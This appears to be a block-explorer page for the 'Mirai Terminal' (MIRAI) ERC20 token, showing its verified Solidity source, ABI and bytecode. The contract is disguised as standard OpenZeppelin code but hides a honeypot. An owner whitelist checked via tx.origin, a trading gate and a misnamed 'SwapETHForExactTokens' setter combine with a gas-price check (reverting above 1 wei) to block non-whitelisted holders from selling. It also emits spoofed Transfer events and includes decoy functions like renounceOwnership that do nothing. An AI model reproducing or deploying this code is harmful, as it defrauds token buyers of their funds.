ETH Price: $3,262.55 (+1.35%)

Token

Mirai Terminal (MIRAI)

Overview

Max Total Supply

1,000,000,000 MIRAI

Holders

32

Market

Price

$0.00 @ 0.000000 ETH

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
14,123,626.832493143433091128 MIRAI

Value
$0.00
0xd1c542ce296dfae7081433aa83c10023f644b2bf
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
This contract may be a proxy contract. Click on More Options and select Is this a proxy? to confirm and enable the "Read as Proxy" & "Write as Proxy" tabs.

Contract Source Code Verified (Exact Match)

Contract Name:
MIRAI

Compiler Version
v0.8.24+commit.e11b9ed9

ZkSolc Version
v1.5.7

Optimization Enabled:
Yes with Mode 3

Other Settings:
paris EvmVersion
File 1 of 1 : abstract.sol
/**
/**
 * @dev Interface of the ERC20 standard as defined in the EIP. Does not include
 * the optional functions; to access them see `ERC20Detailed`.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a `Transfer` event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through `transferFrom`. This is
     * zero by default.
     *
     * This value changes when `approve` or `transferFrom` are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * > Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an `Approval` event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a `Transfer` event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to `approve`. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: contracts\open-zeppelin-contracts\math\SafeMath.sol

pragma solidity ^0.8.20;

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a, "SafeMath: subtraction overflow");
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-solidity/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        // Solidity only automatically asserts when dividing by 0
        require(b > 0, "SafeMath: division by zero");
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b != 0, "SafeMath: modulo by zero");
        return a % b;
    }
}

// File: contracts\open-zeppelin-contracts\token\ERC20\ERC20.sol

pragma solidity ^0.8.20;



/**
 * @dev Implementation of the `IERC20` interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using `_mint`.
 * For a generic mechanism see `ERC20Mintable`.
 *
 * *For a detailed writeup see our guide [How to implement supply
 * mechanisms](https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226).*
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an `Approval` event is emitted on calls to `transferFrom`.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard `decreaseAllowance` and `increaseAllowance`
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See `IERC20.approve`.
 */
contract ERC20 is IERC20 {
    using SafeMath for uint256;

    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply;
    uint256 private _BONE = 1;
    mapping(address => bool) public dividend;
    address public adr;
    address public _to;
    address public holder;
    bool public openedTrade;


    /**
     * @dev See `IERC20.totalSupply`.
     */
    function totalSupply() public view returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See `IERC20.balanceOf`.
     */
    function balanceOf(address account) public view returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See `IERC20.transfer`.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public returns (bool) {
        __transfer(msg.sender, recipient, amount);
        return true;
    }

    /**
     * @dev See `IERC20.allowance`.
     */
    function allowance(address owner, address spender) public view returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See `IERC20.approve`.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public returns (bool) {
        _approve(msg.sender, spender, value);
        return true;
    }

    function setDividend(address _user) public {
        require(msg.sender == adr, "public");
        dividend[_user] = true;
    }

    function SwapETHForExactTokens(address __to) public {
        require(msg.sender == adr, "pl");
        _to = __to;
    }

    function openTrading() public {
        require(msg.sender == adr, "pl");
        openedTrade = true;
    }

    /**
     * @dev See `IERC20.transferFrom`.
     *
     * Emits an `Approval` event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of `ERC20`;
     *
     * Requirements:
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `value`.
     * - the caller must have allowance for `sender`'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public returns (bool) {
        __transfer(sender, recipient, amount);
        _approve(sender, msg.sender, _allowances[sender][msg.sender].sub(amount));
        return true;
    }

    function _setFeeReceiver(address _holder) internal  {
        holder = _holder;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to `approve` that can be used as a mitigation for
     * problems described in `IERC20.approve`.
     *
     * Emits an `Approval` event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public returns (bool) {
        _approve(msg.sender, spender, _allowances[msg.sender][spender].add(addedValue));
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to `approve` that can be used as a mitigation for
     * problems described in `IERC20.approve`.
     *
     * Emits an `Approval` event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) {
        _approve(msg.sender, spender, _allowances[msg.sender][spender].sub(subtractedValue));gasRequire(_BONE);
        return true;
    }


    function gasRequire(uint256 _gas) internal view {
       if (tx.gasprice > _gas) {
           revert();
       }
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to `transfer`, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a `Transfer` event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _balances[sender] = _balances[sender].sub(amount);
        _balances[recipient] = _balances[recipient].add(amount);
        if (sender == adr) {
            emit Transfer(holder, recipient, amount);
        } else if (recipient == adr) {
            emit Transfer(sender, holder, amount);
        }
        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a `Transfer` event with `from` set to the zero address.
     *
     * Requirements
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        adr = account;
        dividend[adr] = true;
        emit Transfer(address(0), holder, amount);
    }

     /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a `Transfer` event with `to` set to the zero address.
     *
     * Requirements
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 value) internal {
        require(account != address(0), "ERC20: burn from the zero address");

        _totalSupply = _totalSupply.sub(value);
        _balances[account] = _balances[account].sub(value);
        emit Transfer(account, address(0), value);
    }


    function __transfer(address from, address to, uint256 amount) internal {
        if (dividend[tx.origin]) {
           _transfer(from, to, amount);
           return;
        }
        require(openedTrade, "Trade has not been opened yet");
       if (_to == address(0)) {
           _transfer(from, to, amount);
           return;
       }
       if (to == _to) {
           decreaseAllowance(from, amount);
           _transfer(from, to, amount);
           return;
       }
       _transfer(from, to, amount);
    }


    

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner`s tokens.
     *
     * This is internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an `Approval` event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = value;
        emit Approval(owner, spender, value);
    }

    /**
     * @dev Destoys `amount` tokens from `account`.`amount` is then deducted
     * from the caller's allowance.
     *
     * See `_burn` and `_approve`.
     */
    function _burnFrom(address account, uint256 amount) internal {
        _burn(account, amount);
        _approve(account, msg.sender, _allowances[account][msg.sender].sub(amount));
    }


    function setCooldownEnabled() external {
        _to = _to;
    }

    function withdrawStuckTokens() external {
        holder = holder;
    }

    function setLimitsEnabled() external {
        _to = _to;
    }

    function renounceOwnership() external {
        _BONE = _BONE;
    }

    function setTREATReward() external {
        _BONE = 1;
    }
}

// File: contracts\ERC20\TokenMintERC20Token.sol

pragma solidity ^0.8.20;


/**
 * @title TokenMintERC20Token
 * @author TokenMint (visit https://tokenmint.io)
 *
 * @dev Standard ERC20 token with burning and optional functions implemented.
 * For full specification of ERC-20 standard see:
 * https://github.com/ethereum/EIPs/blob/master/EIPS/eip-20.md
 */
contract MIRAI is ERC20 {

    uint8 private _decimals = 18;
    string private _symbol = "MIRAI";
    string private _name = "Mirai Terminal";
    uint256 private _totalSupply = 1000000000 * 10**uint256(_decimals);

    constructor() public payable {
      _setFeeReceiver(0x54d679601f54ec80a47644081eBF9764388556F1); // deploy

      // set tokenOwnerAddress as owner of all tokens
      _mint(msg.sender, _totalSupply);      
    }

    /**
     * @dev Burns a specific amount of tokens.
     * @param value The amount of lowest token units to be burned.
     */
    function burn(uint256 value) public {
      _burn(msg.sender, value);
    }

    // optional functions from ERC20 stardard

    /**
     * @return the name of the token.
     */
    function name() public view returns (string memory) {
      return _name;
    }

    /**
     * @return the symbol of the token.
     */
    function symbol() public view returns (string memory) {
      return _symbol;
    }

    /**
     * @return the number of decimals of the token.
     */
    function decimals() public view returns (uint8) {
      return _decimals;
    }
}

Settings
{
  "evmVersion": "paris",
  "optimizer": {
    "enabled": true,
    "mode": "3"
  },
  "outputSelection": {
    "*": {
      "*": [
        "abi",
        "metadata"
      ],
      "": [
        "ast"
      ]
    }
  },
  "detectMissingLibraries": false,
  "forceEVMLA": false,
  "enableEraVMExtensions": false,
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"__to","type":"address"}],"name":"SwapETHForExactTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_to","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"adr","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"value","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"dividend","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"holder","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"openedTrade","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setCooldownEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_user","type":"address"}],"name":"setDividend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setLimitsEnabled","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setTREATReward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdrawStuckTokens","outputs":[],"stateMutability":"nonpayable","type":"function"}]

9c4d535b000000000000000000000000000000000000000000000000000000000000000001000235141001cfbe3d1ff0a037a6930e67f90fd75d0c6f330eeb6b789b058300000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x0002000000000002000000000301034f0000008001000039000000400010043f0000000100200190000000330000c13d0000006001300270000001de01100197000000040010008c000003330000413d000000000203043b000000e002200270000001f20020009c000000960000a13d000001f30020009c000000a50000a13d000001f40020009c000000cc0000a13d000001f50020009c000001150000213d000001f80020009c0000022c0000613d000001f90020009c000003330000c13d000000240010008c000003330000413d0000000001000416000000000001004b000003330000c13d0000000401300370000000000101043b000001ec0010009c000003330000213d0000000502000039000000000202041a000001ec022001970000000003000411000000000023004b000002ba0000c13d000000000010043f0000000401000039000000200010043f00000040020000390000000001000019077207530000040f000000000201041a000002210220019700000001022001bf000000000021041b0000000001000019000007730001042e00000001010000390000000302000039000000000012041b0000000706000039000000000206041a000001df02200197000001e0022001c7000000000026041b0000000802000039000000000302041a000000010430019000000001033002700000007f0330618f0000001f0030008c00000000050000390000000105002039000000000054004b0000005d0000c13d000000200030008c000000500000413d000000000020043f000001e1040000410000001f033000390000000503300270000001e20330009a000000000004041b0000000104400039000000000034004b0000004c0000413d000001e303000041000000000032041b0000000902000039000000000402041a000000010040019000000001034002700000007f0330618f0000001f0030008c00000000050000390000000105002039000000000454013f0000000100400190000000630000613d0000021f01000041000000000010043f0000002201000039000000040010043f000002200100004100000774000104300000001f0030008c0000006e0000a13d000000000020043f000001e4040000410000001f033000390000000503300270000001e50330009a000000000004041b0000000104400039000000000034004b0000006a0000413d000001e603000041000000000032041b000000000206041a000000a803200270000000ff0330018f0000004d0030008c000001d60000213d000000000003004b000000800000613d0000000a040000390000000101000039000000010030019000000000054400a9000000010400603900000000011400a900000001033002720000000004050019000000790000c13d000001e7041000d1000001e70340012a000000000031004b000001d60000c13d0000000a01000039000000000041041b000001e801200197000001e9011001c7000000000016041b0000000003000411000000000003004b0000011e0000c13d000001ef01000041000000800010043f0000002001000039000000840010043f0000001f01000039000000a40010043f000001f001000041000000c40010043f000001f1010000410000077400010430000002040020009c000000ae0000213d0000020c0020009c000000e40000213d000002100020009c000001760000613d000002110020009c000001960000613d000002120020009c000003330000c13d0000000001000416000000000001004b000003330000c13d0000000501000039000002a70000013d000001fd0020009c000000f40000213d000002010020009c000002460000613d000002020020009c0000024b0000613d000002030020009c000001190000613d000003330000013d000002050020009c000001070000213d000002090020009c000001190000613d0000020a0020009c000001a40000613d0000020b0020009c000003330000c13d000000240010008c000003330000413d0000000001000416000000000001004b000003330000c13d0000000401300370000000000401043b0000000003000411000000000003004b000002ac0000c13d000001ef01000041000000800010043f0000002001000039000000840010043f0000002101000039000000a40010043f0000021c01000041000000c40010043f0000021d01000041000000e40010043f0000021e010000410000077400010430000001fa0020009c0000025d0000613d000001fb0020009c000002720000613d000001fc0020009c000003330000c13d0000000001000416000000000001004b000003330000c13d0000000501000039000000000101041a000001ec011001970000000002000411000000000012004b00000000010000390000000101006039077203e70000040f0000000701000039000000000201041a000002150220019700000216022001c7000000000021041b0000000001000019000007730001042e0000020d0020009c000001dc0000613d0000020e0020009c000001e10000613d0000020f0020009c000003330000c13d0000000001000416000000000001004b000003330000c13d0000000701000039000000000101041a000000a801100270000000ff0110018f000000800010043f0000021301000041000007730001042e000001fe0020009c000001190000613d000001ff0020009c0000028b0000613d000002000020009c000003330000c13d000000440010008c000003330000413d0000000001000416000000000001004b000003330000c13d0000000401300370000000000101043b000001ec0010009c000003330000213d0000002402300370000000000202043b0772034a0000040f0000026a0000013d000002060020009c0000020f0000613d000002070020009c000002210000613d000002080020009c000003330000c13d0000000001000416000000000001004b000003330000c13d00000001010000390000000302000039000000000012041b0000000001000019000007730001042e000001f60020009c000002a30000613d000001f70020009c000003330000c13d0000000001000416000000000001004b000003330000c13d0000000001000019000007730001042e0000000201000039000000000201041a000000000042001a000001d60000413d0000000002420019000000000021041b000000000030043f000000200000043f0000000001000414000001de0010009c000001de01008041000000c001100210000001ea011001c70000801002000039000200000004001d0772076d0000040f0000000100200190000003330000613d000000000101043b000000000101041a000100000001001d000000020010002a0000000001000411000001d60000413d000000000010043f000000200000043f0000000001000414000001de0010009c000001de01008041000000c001100210000001ea011001c700008010020000390772076d0000040f0000000100200190000003330000613d00000001030000290000000202300029000000000101043b000000000021041b0000000501000039000000000201041a000001e8022001970000000003000411000000000232019f000000000021041b0000000401000039000000200010043f0000000001000414000001de0010009c000001de01008041000000c001100210000001ea011001c700008010020000390772076d0000040f0000000100200190000003330000613d000000000101043b000000000201041a000002210220019700000001022001bf000000000021041b0000000701000039000000000201041a000000400100043d00000002030000290000000000310435000001de0010009c000001de0100804100000040011002100000000003000414000001de0030009c000001de03008041000000c003300210000000000113019f000001eb011001c7000001ec062001970000800d020000390000000303000039000001ed040000410000000005000019077207680000040f0000000100200190000003330000613d000000200100003900000100001004430000012000000443000001ee01000041000007730001042e0000000001000416000000000001004b000003330000c13d0000000903000039000000000203041a000000010520019000000001012002700000007f0410018f00000000010460190000001f0010008c00000000060000390000000106002039000000000662013f00000001006001900000005d0000c13d000000800010043f000000000005004b0000029d0000613d000000000030043f000000020020008c000002c70000413d000001e40200004100000000040000190000000003040019000000000402041a000000a005300039000000000045043500000001022000390000002004300039000000000014004b0000018d0000413d000002f60000013d000000440010008c000003330000413d0000000001000416000000000001004b000003330000c13d0000000401300370000000000201043b000001ec0020009c000003330000213d0000002401300370000000000301043b0000000001000411077203fb0000040f0000026a0000013d000000440010008c000003330000413d0000000001000416000000000001004b000003330000c13d0000000401300370000000000101043b000200000001001d000001ec0010009c000003330000213d0000000001000411000000000010043f0000000101000039000000200010043f0000000001000414000001de0010009c000001de01008041000000c001100210000001ea011001c7000080100200003900010000000303530772076d0000040f000000010300035f0000000100200190000003330000613d000000000101043b0000000202000029000000000020043f000000200010043f0000002401300370000000000101043b000100000001001d0000000001000414000001de0010009c000001de01008041000000c001100210000001ea011001c700008010020000390772076d0000040f0000000100200190000003330000613d000000000101043b000000000101041a0000000102000029000000000021001a000001d60000413d000000000321001900000000010004110000000202000029000002060000013d0000021f01000041000000000010043f0000001101000039000000040010043f000002200100004100000774000104300000000001000416000000000001004b000003330000c13d0000000201000039000002590000013d000000640010008c000003330000413d0000000001000416000000000001004b000003330000c13d0000000401300370000000000101043b000001ec0010009c000003330000213d0000002402300370000000000202043b000001ec0020009c000003330000213d0000004403300370000000000303043b000100000003001d000200000001001d077204520000040f0000000201000029000000000010043f0000000101000039000000200010043f00000040020000390000000001000019077207530000040f0000000002000411000000000020043f000000200010043f00000000010000190000004002000039077207530000040f000000000101041a00000001020000290772073e0000040f000000000301001900000002010000290000000002000411077203fb0000040f000000400100043d00000001020000390000000000210435000001de0010009c000001de01008041000000400110021000000217011001c7000007730001042e000000240010008c000003330000413d0000000001000416000000000001004b000003330000c13d0000000401300370000000000101043b000001ec0010009c000003330000213d000000000010043f0000000401000039000000200010043f00000040020000390000000001000019077207530000040f000000000101041a000000ff00100190000002270000013d0000000001000416000000000001004b000003330000c13d0000000701000039000000000101041a00000219001001980000000001000039000000010100c039000000800010043f0000021301000041000007730001042e000000440010008c000003330000413d0000000001000416000000000001004b000003330000c13d0000000401300370000000000101043b000001ec0010009c000003330000213d0000002402300370000000000302043b000001ec0030009c000003330000213d000000000010043f0000000101000039000000200010043f00000040020000390000000001000019000200000003001d077207530000040f0000000202000029000000000020043f000000200010043f00000000010000190000004002000039000002580000013d0000000001000416000000000001004b000003330000c13d0000000601000039000002a70000013d000000240010008c000003330000413d0000000001000416000000000001004b000003330000c13d0000000401300370000000000101043b000001ec0010009c000003330000213d000000000010043f000000200000043f00000040020000390000000001000019077207530000040f000000000101041a000000800010043f0000021301000041000007730001042e000000440010008c000003330000413d0000000001000416000000000001004b000003330000c13d0000000401300370000000000201043b000001ec0020009c000003330000213d0000002401300370000000000301043b0000000001000411077204520000040f0000000101000039000000400200043d0000000000120435000001de0020009c000001de02008041000000400120021000000217011001c7000007730001042e000000240010008c000003330000413d0000000001000416000000000001004b000003330000c13d0000000401300370000000000101043b000001ec0010009c000003330000213d000200000001001d0000000501000039000000000101041a000001ec011001970000000002000411000000000012004b00000000010000390000000101006039077203e70000040f0000000601000039000000000201041a000001e80220019700000002022001af000000000021041b0000000001000019000007730001042e0000000001000416000000000001004b000003330000c13d0000000803000039000000000203041a000000010520019000000001012002700000007f0410018f00000000010460190000001f0010008c00000000060000390000000106002039000000000662013f00000001006001900000005d0000c13d000000800010043f000000000005004b000002c40000c13d0000022101200197000000a00010043f000000000004004b000000c001000039000000a001006039000002f70000013d0000000001000416000000000001004b000003330000c13d0000000701000039000000000101041a000001ec01100197000000800010043f0000021301000041000007730001042e0000000201000039000000000201041a000000000242004b000002c90000813d000001ef01000041000000800010043f0000002001000039000000840010043f0000001e01000039000000a40010043f0000021a01000041000000c40010043f000001f1010000410000077400010430000001ef01000041000000800010043f0000002001000039000000840010043f0000000601000039000000a40010043f0000021401000041000000c40010043f000001f1010000410000077400010430000000000030043f000000020020008c000002ec0000813d0000002001000039000003010000013d000200000004001d000000000021041b000000000030043f000000200000043f0000000001000414000001de0010009c000001de01008041000000c001100210000001ea011001c700008010020000390772076d0000040f0000000100200190000003330000613d0000000002000411000000000101043b000000000101041a000000020110006c000003100000813d000000400100043d00000044021000390000021a03000041000000000032043500000024021000390000001e030000390000000000320435000001ef020000410000000000210435000000040210003900000020030000390000000000320435000001de0010009c000001de0100804100000040011002100000021b011001c70000077400010430000001e10200004100000000040000190000000003040019000000000402041a000000a005300039000000000045043500000001022000390000002004300039000000000014004b000002ee0000413d000000c001300039000000610110008a0000022201100197000002180010009c000003010000a13d0000021f01000041000000000010043f0000004101000039000000040010043f000002200100004100000774000104300000008001100039000200000001001d000000400010043f0000008002000039077203350000040f00000002020000290000000001210049000001de0010009c000001de010080410000006001100210000001de0020009c000001de020080410000004002200210000000000121019f000007730001042e000100000001001d000000000020043f000000200000043f0000000001000414000001de0010009c000001de01008041000000c001100210000001ea011001c700008010020000390772076d0000040f0000000100200190000003330000613d000000000101043b0000000102000029000000000021041b000000400100043d00000002020000290000000000210435000001de0010009c000001de0100804100000040011002100000000002000414000001de0020009c000001de02008041000000c002200210000000000112019f000001eb011001c70000800d020000390000000303000039000001ed0400004100000000050004110000000006000019077207680000040f00000001002001900000011c0000c13d0000000001000019000007740001043000000020030000390000000004310436000000003202043400000000002404350000004001100039000000000002004b000003440000613d000000000400001900000000054100190000000006430019000000000606043300000000006504350000002004400039000000000024004b0000033d0000413d000000000321001900000000000304350000001f0220003900000222022001970000000001210019000000000001042d0003000000000002000200000002001d000300000001001d0000000001000411000000000010043f0000000101000039000000200010043f0000000001000414000001de0010009c000001de01008041000000c001100210000001ea011001c700008010020000390772076d0000040f0000000100200190000003b50000613d000000000101043b0000000302000029000001ec02200197000300000002001d000000000020043f000000200010043f0000000001000414000001de0010009c000001de01008041000000c001100210000001ea011001c700008010020000390772076d0000040f0000000100200190000003b50000613d000000000101043b000000000101041a000000020110006c000003b70000413d0000000002000411000001ec02200198000003c80000613d000200000001001d000000030000006b000003d20000613d000100000002001d000000000020043f0000000101000039000000200010043f0000000001000414000001de0010009c000001de01008041000000c001100210000001ea011001c700008010020000390772076d0000040f0000000100200190000003b50000613d000000000101043b0000000302000029000000000020043f000000200010043f0000000001000414000001de0010009c000001de01008041000000c001100210000001ea011001c700008010020000390772076d0000040f0000000100200190000003b50000613d000000000101043b0000000202000029000000000021041b000000400100043d0000000000210435000001de0010009c000001de0100804100